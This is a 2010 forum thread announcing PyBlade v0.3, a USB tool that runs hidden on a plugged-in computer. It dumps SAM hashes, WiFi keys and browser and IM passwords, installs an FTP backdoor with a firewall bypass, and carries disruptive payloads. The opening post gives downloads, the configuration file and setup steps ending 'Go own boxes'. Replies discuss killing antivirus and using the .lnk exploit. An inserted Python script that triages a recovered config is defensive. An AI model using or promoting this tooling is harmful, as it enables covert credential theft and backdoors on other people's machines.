
Pyblade


93 replies to this topic

#1 sablefoxx

Posted 10 August 2010 - 09:10 PM

PyBlade v0.3



About:
Some people have been asking for an updated switchblade to run on Vista/7 computers, so I thought I'd throw something together. It's a work in progress; I'm also fairly new to Python, so no making fun of my code. Please download and report bugs or requested features!

Current Abilities:
-Gathers system info, running processes, and local IP settings
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)
-Keyboard Randomizer payload
-Landmine payload
-Emo Computer payload
-Rick Roll payload
-IE Homepage payload
-Save logs in .txt, .html, or .xml format
-U3 support via .u3p file
-Support for file slurping
-FTP backdoor installer (w/ XP Firewall bypass)


Planned Updates:

-Netcat backdoor installer
-AV Bypass / Evade
-Save all logs in .html / .xml format

Downloads:
PyBlade v0.3 ==> md5: a9b10c99eb2f2ecbabefb0f908a1e3bf
PyBlade Source Code v0.3 (Includes payloads' source code)
U3 Support (.u3p) *BETA*

*** Change Log ***

v0.1
-Gathers system info, running processes, and network connections
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)


v0.2
-Added Keyboard Randomizer payload
-Added Landmine payload
-Added Change IE homepage payload
-Added comments to code
-Changed sysinfo to collect local IP settings
-Added options to save logs as .txt, .html, or .xml
-Added U3 support
-Checks to see if Firefox is installed before dumping passwords


v0.3
-Added Emo Computer payload (harmless, don't worry)
-Added Random Rick Roll payload
-Added support for file slurping
-Added icons for .exe's
-Added FTP Server backdoor
-Correctly sets file extensions when saving logs in .html/.xml
-Added ability to bypass XP Firewall, and hide exceptions from the GUI
-Added time stamps to log directories



*** Quick Setup Guide ***


Setup for Non-U3 Drives:
0. Obtain a USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract, then copy the contents of PyBlade.rar to the root of your USB drive
3. Edit blade.conf to do your bidding (see below)
4. Go own boxes

Setup for Unmodified U3 Drives:
0. Obtain a U3 USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract, then copy the contents of PyBlade.rar to the root of the flash partition on the U3 drive
3. Edit blade.conf to do your bidding (see below)
4. Download F_Bex.u3p (see above)
5. Open the U3 menu, click "Add Programs" and "Install from My Computer"
6. Select F_Bex.u3p, and set it to automatically run when the drive is inserted
7. Go own boxes

Configure Your Blade:
1. Open "blade.conf" in your favorite text editor (or notepad)
2. Enable/Disable programs by changing their execute value (Enable = 1)
Here are the default settings for v0.3:
CODE
# --------------------------------
#  SwitchBlade Configuration File
# --------------------------------

# Log File Type
#   Possible values; text, html, xml
log=html

# System Dumps
sysinfo=1
pwdump=1
wifi=1
mspass=1
iepw=1
iehist=1
ffpw=1
chromepw=1

# Payloads
keyrand=0
landmine=0
rickroll=0
emo=0

# Change IE Homepage
iehome=0
iehome_url=http://google.com

# Backdoors
ftpme=0


# File Slurping
#   Separate multiple directories using ;'s
slurp=0
slurp_dirs=C:\Files;C:\Files2

Note that lines starting with '#' are comments and are ignored during execution. Do NOT comment out lines to disable programs; just set their execute value to 0.

3. Some lines contain strings:
logs= Change this to set how the log files are saved (.log, .html, .xml)
iehome_url= If the IE Homepage payload is enabled (iehome=1), this is the URL that the homepage will be set to.
slurp_dirs= This is a list of the directories you want copied onto your drive; you can list multiple directories by separating them with semicolons.
4. To execute manually, run "bex.exe"

Payloads:
Keyboard Randomizer: This program randomizes all keyboard input while it's running (keyrand).
Landmine: Selects a key at random and forcefully turns off the computer when it's pressed (landmine).
Emo Computer: The computer becomes sad and pretends to delete all the files on the computer (emo).
FTPme: Installs an FTP server on the root of the C: drive with a blank username/password (ftpme).
Random Rick Roller: Will open up rick rolls at random time intervals (rickroll).
Note: All payloads are activated on reboot (except for FTPme).


Let me know if you find bugs, and come say hi on IRC!

Edited by sablefoxx, 23 August 2010 - 12:19 PM.

i7 860 @ 3.36GHz / P55 EVGA / 4Gb DDR3 / 2x GTX 460s in SLi / 2x1Tb RAID 0 / 40Gb Intel SSD
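
As an added incident-response example (not PyBlade's own code, and not part of the original post): a Python triage script that parses a recovered blade.conf using the rules described in the setup guide (lines starting with '#' are comments, programs are switched off with execute value 0 rather than by commenting, log must be text/html/xml, slurp_dirs is ';'-separated) and summarises what the drive was configured to do. The sample config, its iehome_url value and the key groupings are constructed for illustration.

```python
# Added IR triage example (not PyBlade's own code): parse a recovered blade.conf
# with the rules the post gives and summarise which programs were switched on.
DUMPS = ("sysinfo", "pwdump", "wifi", "mspass", "iepw", "iehist", "ffpw", "chromepw")
PAYLOADS = ("keyrand", "landmine", "rickroll", "emo", "iehome")
BACKDOORS = ("ftpme",)
VALID_LOG = ("text", "html", "xml")

# Constructed sample of a recovered config (not a real capture).
SAMPLE_CONF = "\n".join([
    "# Log File Type", "log=html",
    "sysinfo=1", "pwdump=1", "wifi=1", "mspass=0", "iepw=0", "iehist=0",
    "#ffpw=1", "chromepw=0",          # commented out: NOT disabled per the post
    "keyrand=0", "landmine=0", "rickroll=0", "emo=0",
    "iehome=1", "iehome_url=http://example.invalid",
    "ftpme=1", "slurp=1", r"slurp_dirs=C:\Files;C:\Files2",
])

def parse_blade_conf(text):
    """Return {key: value}; blank lines and '#' comment lines are skipped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def triage(text):
    """Summarise which dumps, payloads and backdoors a recovered conf enabled."""
    conf = parse_blade_conf(text)
    def on(names):
        return [n for n in names if conf.get(n) == "1"]
    report = {"log": conf.get("log"), "dumps": on(DUMPS), "payloads": on(PAYLOADS),
              "backdoors": on(BACKDOORS), "slurp_dirs": [], "warnings": []}
    if report["log"] not in VALID_LOG:
        report["warnings"].append("unexpected log type: %r" % report["log"])
    if conf.get("slurp") == "1":
        report["slurp_dirs"] = [d for d in conf.get("slurp_dirs", "").split(";") if d]
    if "iehome" in report["payloads"]:
        report["ie_homepage"] = conf.get("iehome_url")
    # An absent key was probably commented out, which the post says does NOT
    # disable that program: flag it instead of assuming it was off.
    missing = [n for n in DUMPS + PAYLOADS + BACKDOORS + ("slurp",) if n not in conf]
    if missing:
        report["warnings"].append("missing (commented out?): " + ", ".join(missing))
    return report
```

Run `triage(open("blade.conf").read())` on a config copied off a suspect drive to get the enabled dumps, payloads, backdoors and slurp targets in one dictionary.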

#2 okiwan

Posted 10 August 2010 - 11:47 PM

Wow, you weren't joking. You're the man! Can't wait to try it out.
THANKS!
twitter - @OneAngryPenguin
http://okiwan.blogspot.com/


QUOTE
"Shannon what you got?"
"IM A BIRD!"

#3 sablefoxx

Posted 11 August 2010 - 12:02 AM

Whoops, forgot a file, you may want to re-download it. Also just found a couple of bugs, working on fixes.


Edit --Fixed problems!

Edited by sablefoxx, 23 September 2010 - 08:08 PM.


#4 Jen

Posted 11 August 2010 - 02:40 AM

I thought it stopped things from autorunning with .inf?

#5 sablefoxx

Posted 11 August 2010 - 10:37 AM

QUOTE (Jen @ Wed, 11 Aug 2010 08:40:44 +0000)
I thought it stopped things from autorunning with .inf?


It should still work on XP, I'm working on getting the new .lnk icon exploit to run it on unpatched Vista/Seven computers, and U3 support.

Edited by sablefoxx, 11 August 2010 - 10:37 AM.


#6 m1k

Posted 11 August 2010 - 12:14 PM

Well done Batman!!

#7 Zimmer

Posted 11 August 2010 - 03:19 PM

Nice!


#8 misfitsman805

Posted 11 August 2010 - 03:35 PM

Nice! Keep up the good work man! Can't wait for future versions! XD
"Oh no! All of my pineapple code was on that! This is bad!" - Darren Kitchen

#9 IrishFavor

Posted 13 August 2010 - 09:25 AM

So far it looks great. Thank you for all the work on this project.



#10 m1k

Posted 14 August 2010 - 11:45 AM

It works on XP...
Any Vista/Seven reports?

#11 xantos_gambit

Posted 16 August 2010 - 05:50 PM

Pretty cool, needs an AV killer or something; most AVs destroy it before it gets a chance to do anything useful.

#12 sablefoxx

Posted 16 August 2010 - 06:08 PM

Updated to v0.2, added payloads, and some other small stuff.

QUOTE (xantos_gambit @ Mon, 16 Aug 2010 22:50:03 +0000)
Pretty cool, needs an AV killer or something; most AVs destroy it before it gets a chance to do anything useful.


Hmm... I have yet to see this done well, perhaps I'll try something.

I could easily add an encrypted .rar where the files in question could be stored until after the AV has been killed or disabled.
"bex.exe" shouldn't be flagged by VirusTotal.

The problem is that killing AV software isn't as simple as making a taskkill system call, but perhaps we can disable it or crash it (without crashing the OS). The problem with this method is that we can only target specific titles.

Edited by sablefoxx, 16 August 2010 - 10:09 PM.


#13 Mr. Stuky

Posted 16 August 2010 - 10:49 PM

Sorry for my noobness, but can you make a tutorial on how to use these scripts? And how to make it work with a U3 flash drive. Thanks, and I do apologize for my ignorance on this awesome software. Thanks. Good job Batman

#14 sablefoxx

Posted 16 August 2010 - 11:08 PM

QUOTE (Mr. Stuky @ Tue, 17 Aug 2010 04:49:04 +0000)
Sorry for my noobness, but can you make a tutorial on how to use these scripts? And how to make it work with a U3 flash drive. Thanks, and I do apologize for my ignorance on this awesome software. Thanks. Good job Batman


I'll throw something together, brb.

#15 Mr. Stuky

Posted 16 August 2010 - 11:45 PM

Thanks, Really appreciated. Btw Added you so we can TF2 Sometime. ;]

#16 Jen

Posted 17 August 2010 - 02:24 AM

I noticed you removed the .lnk icon exploit as part of your planned features. Is it impossible to implement it?

#17 sablefoxx

Posted 17 August 2010 - 06:14 AM

QUOTE (Jen @ Tue, 17 Aug 2010 07:24:04 +0000)
I noticed you removed the .lnk icon exploit as part of your planned features. Is it impossible to implement it?


More difficult than originally anticipated, may add it later.

#18 m1k

Posted 17 August 2010 - 07:23 AM

Antivirus disabling....
also if my Avira doesn't see anything....

#19 w1ldf1re

Posted 17 August 2010 - 01:26 PM

Awesome that you're now using Python!
I've been doing a course in it at university and it's nice to be able to see what you're doing in your programs and to be able to fix any errors that I get.

Hope I can contribute at some stage.


#20 w1ldf1re

Posted 17 August 2010 - 02:42 PM

(delete)

Edited by w1ldf1re, 17 August 2010 - 02:55 PM.




